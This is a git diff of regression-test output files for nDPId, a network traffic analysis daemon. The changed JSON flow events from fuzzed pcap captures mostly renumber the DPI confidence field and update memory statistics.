00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -1423,16 +1423,16 @@ 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7580000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7580000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635044,"flow_last_seen":1120469635044,"flow_idle_time":7580000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":120,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635044,"flow_last_seen":1120469635044,"flow_idle_time":7580000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":120,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7580000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7580000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00585{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":691,"packets-processed":569,"total-skipped-flows":0,"total-l4-payload-len":60810,"total-not-detected-flows":35,"total-guessed-flows":28,"total-detected-flows":194,"total-detection-updates":88,"total-updates":31,"current-active-flows":0,"total-active-flows":257,"total-idle-flows":257,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1438,"global_ts_msec":1120471107427} @@ -1444,9 +1444,9 @@ ~~ total active/idle flows...: 257/257 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6188424 bytes -~~ total memory freed........: 6188424 bytes -~~ total allocations/frees...: 119744/119744 +~~ total memory allocated....: 6322058 bytes +~~ total memory freed........: 6322058 bytes +~~ total allocations/frees...: 122506/122506 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars ~~ json string max len.......: 1897 chars diff --git a/test/results/fuzz-2006-09-29-28586.pcap.out b/test/results/fuzz-2006-09-29-28586.pcap.out index f7d79cc7f..75275b960 100644 --- a/test/results/fuzz-2006-09-29-28586.pcap.out +++ b/test/results/fuzz-2006-09-29-28586.pcap.out 
@@ -12,7 +12,7 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} 02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"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"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -23,10 +23,10 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} 
